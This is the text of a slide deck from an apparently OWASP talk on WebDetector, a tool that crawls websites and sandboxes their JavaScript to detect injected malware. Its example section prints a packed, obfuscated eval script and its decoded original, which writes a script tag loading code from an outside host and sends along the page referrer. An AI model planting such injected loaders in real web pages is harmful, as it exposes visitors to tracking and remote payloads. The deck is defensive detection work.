OWASP Presentation WebTracker

Download as pdf or txt
Download as pdf or txt
You are on page 1of 31

Monitoring web sites for malware injection with

WebDetector
A pet project from Paolo Di Prodi
About Me
Presenting today:
Dr. Paolo Di Prodi a.k.a epokh
Previous work on:
Started with DOS,Win3.1,Win95,98 now Win8!
Binary reversing on crack and warez
First Java ME bytecode patcher
Research background:
Machine learning and AI in social robotics
About Me
Working now for Microsoft on:
Machine Learning applied to Intrusion detection
Big data and security
Build POC systems with any technology available
from Microsoft and outside
About Me
Problem:
How many websites are compromised?
What are the most common attack vectors?
How can we monitor a website?
Solution:
Requires a web tracking system
Requires JS sandboxing
Requires heuristics
Source: White Hat Report 2013
XSS types:
Stored
Reflected
Dom based
XSS vectors:
JS
PDF
ActiveX
Iframe
Shockwave
Source: Black Hat Report 2011
Source: Acunetix
Basic behaviours:
URL injection to malware dropper
Form injection for phishing
Page redirection
Cookie stealing
Example of storage based XSS
We need to monitor our websites:
We want to know:
What was added/removed/deleted?
When did that happen?
Who did it?
Is it malicious or just our webadmin playing tricks?
Solution:
Sounds like a GIT job to me
With some WGET scripting
Problems:
WGET not doing a good crawling job especially for dynamic
pages
Heritrix
WebCrawler
Thug
DOM
WARC/ARC
ingester
MySQL
DB
Indexes
Timestamps
JSProfiler
NoDOM
Report
CSV
Mongo
W
e
b
s
i
t
e

J
o
b
Webtracker
Virtual Box
Webtracker
Provision the VM -> 30 minutes
Install packages
Java, Python, Perl etc
Google V8 JS patched
Mozzilla JS patches
Setup DB
Setup Heritrix
Ready to go
Heritrix
Latest Version January 2014
Java Based Web Crawler
Run on multiple instances
Python Thug:
Latest Version March 2014
HoneyPot client sandbox for JS execution
Currently detects: 161 Exploits
Including: Adobe PDF, Shockwave, Java Web
Logs the following features for each JS script
Document.write
string_instance: var foo=hello world
Element instance: var btn=document.createElement
Object instance: var foo={text:hello world}
Eval: var foo=eval(x * y )
Location: hash,host,hostname,href,origin,port,etc:
Escape and unescape
Encode: encodeURI(),decodeURI()
Decode: dencodeURIComponent()
Patched JS monkey
Example:
eval(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!''.replace(/^/,String)){while(c--
){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){r
eturn d[e]}];e=function(){return'\\w+'};c=1};while(c-
-){if(k[c]){p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return
p}('5("1.4(\'<0 7=\\"3\\"
2=\\"6://d.8.c/b/?a=\'+1.9+\'\\"></0>\');");',14,14,'s
cript|document|src|Javascript|write|eval|http|lan
guage|robomotic|referrer|ref|style|com|www'.spli
t('|'),0,{}))
Useful to de-obfuscate
Original was:
eval("document.write('<script language=\"Javascript\"
src=\"http://www.robomotic.com/style/?ref='+document.referrer+'\"></
script>');");
Profile generated (on the obfuscated one):
String_instance: 4
Document_Write: 1
Element_instance,
Object_instance,decode,location,escape,decode:
0
Eval: 2
Useful to de-obfuscate
Logs the following features for each JS script
Document.write
string_instance: var foo=hello world
Element instance: var btn=document.createElement
Object instance: var foo={text:hello world}
Eval: var foo=eval(x * y )
Location: hash,host,hostname,href,origin,port,etc:
Escape and unescape
Encode: encodeURI(),decodeURI()
Decode: dencodeURIComponent()
Python thug
WebDetector
Version 3:
Django app with RESTFUL api to Hedrix
Celery for distributed task allocation
Integration with Zozzle
Anonimization:
Raspberry PI with Onion PI
Basically TOR
Domain
URL
Crawl
Ingest Indexing
Analysis
HTML
JS no
DOM
JS DOM
Report
Can you guess which sites are malicious?
The first four were fetched by compromised malware sites
Classification via Nave Bayes or Decision Tree gives 100% accuracy.
Small dataset: 85 GOOD, 64 BAD
Mean(Feature) GOOD BAD
Document_write 90 15
String_instance 4626 135
Element_instance 5 30
Object_instance 10 60
Eval 61 27
Escape 12 0
A larger dataset is required to run a statistically significant classification rule,
but is a good start
Js Profile report
domain
sample
s
document_
write
string_insta
nce
element_inst
ance
object_inst
ance eval
locatio
n
escap
e
encod
e
deco
de class
moderndevice.c
om 3 86 686 11 9 42 0 10 0 0GOOD
twimg.com 3 92 1523 9 8 38 0 7 1 4GOOD
neurdon.com 2 74 382.5 11 10 51 0 8 0 0GOOD
norduino.com 2 89 759 16 11 42 0 9 0 0GOOD
robomotic.com 2 92 382 11 11 40 0 9 0 0GOOD
archive.org 1 74 2391 8 4 38 0 0 3 9GOOD
xxxxxxx.xx 2 32 2417 28 67 18 2 4 3 10BAD
xxxxxxx.xxx.xx 4 38 3092 32 74 19 4 3 3 10BAD
wordpress.com 1 96 3207 4 24 32 0 1 5 13GOOD
Thug report JSON example:
"exploits": [
{
"url": "about:blank",
"cve": "CVE-2007-4391",
"data": null,
"description": "Server Console Overflow",
"module": "Yahoo! Messenger 8.x Ywcvwr ActiveX"
}
],
"behavior": [
{
"timestamp": "2014-05-27 15:50:02.075500",
"cve": "CVE-2007-4391",
"description": "[Yahoo! Messenger 8.x Ywcvwr ActiveX] Server Console Overflow",
"method": "Dynamic Analysis"
}
],
"url": xxxxxxx.fr",
"timestamp": "2014-05-27 15:50:01.878054",
"connections": [],
"locations": []
Suspicious URI
Job Name URI Timestmap Type Size Offset File ResponseParent
Robomotic
http://62.76.43.78/p2p/PP_detalis_726
716942049.pdf... 14/05/2014 16:14 text/html; charset="utf-8" 13428676 2124 CM.1.arco 403
http://www.robomotic.c
om/android/ text/html
Outgoing Links
Form redirection
Job Name URI Timestmap Type Size Offset File Res Parent
xxxxxx http://xxxxxx 14/05/2014 18:12
text/html;
charset="utf-8" 4356 234 CM.1.arco 200
http://xxxxxxxx.com/cus
tomers/submit.php
Job Name URI Timestmap Type Size Offset File Res Parent
Robomotic http://beatdiabetes.us/ 14/05/2014 16:14
text/html;
charset="utf-8" 8555635 6852 CM.2.arco 200
http://www.robomotic.c
om/android/ text/html
Robomotic http://beatdiabetes.us/ 14/04/2014 14:37
text/html;
charset="utf-8" 11544973 6852 CM.1.arco 200
http://www.robomotic.c
om/android/ text/html
Risk indication summary
domain samples outside_form outside_ip outside_js inside_js embedded_js exploits risk
youtube.com 151 0 0 0 161 511 0 LOW
robomotic.com 150 0 0 430 1418 630 0 LOW
xxxxxxxx.fr 104 104 0 520 624 416 2 HIGH
wordpress.org 25 0 0 4 70 136 0 LOW
lakiscamp.gr 23 0 0 13 352 98 1 HIGH
facebook.com 22 0 0 0 0 132 0 LOW
xxxxxxxx.com 15 1 0 1 2 3 1 HIGH
vimeo.com 15 0 0 32 32 32 0 LOW
gmpg.org 14 0 0 0 0 0 0 LOW
xxxxxxx.fr 5 1 0 25 25 10 1 HIGH
adobe.com 4 0 0 0 60 24 0 LOW
apple.com 4 0 0 0 44 20 0 LOW
browsehappy.com 4 0 0 6 8 6 0 LOW
neurdon.com 4 0 0 0 8 8 0 LOW
ytimg.com 4 0 0 0 0 0 0 LOW
amarino-toolkit.net 2 0 0 10 10 8 0 LOW
beatdiabetes.us 2 0 0 4 8 8 0 LOW
example.com 2 0 0 0 0 0 0 LOW
gstatic.com 2 0 0 0 0 0 0 LOW
twitter.com 2 0 0 0 0 6 0 LOW
w3.org 2 0 0 0 0 0 0 LOW
wp.com 2 0 0 0 0 10 0 LOW
xxxx.co.uk 1 0 1 23 8 8 0 MEDIUM
Things that I learned:
Wget vs Heritrix:
Fails to crawl highly dynamic pages
Efficient on simple sites
Plenty of rules and plugins to use
Heritrix requires Java environment
Tor: uses only socks, requires a proxy on host
Tor: be careful with DNS leaking
Detecting more XSS passive:
Harder than active XSS scanning
Semantically how do you know that a web page is
behaving as originally designed?
Efficient on simple sites
Plenty of rules and plugins to use
Heritrix requires Java environment
Better heuristics:
Check for cookie manipulation
Check XSS also on: onLoad, onmouseover, img src etc.
Next Version
Django App for reporting via Grappelli
Support for Heritrix 3
WARC ingester directly to DB
API Restful interface for automation
Support for malware blacklists
Extend Thug plugins?
Plugin for Microsoft Zozzle?
Project will be on Github at some point this
year
Vagrant image will be on the cloud
Contact me: [email protected]

You might also like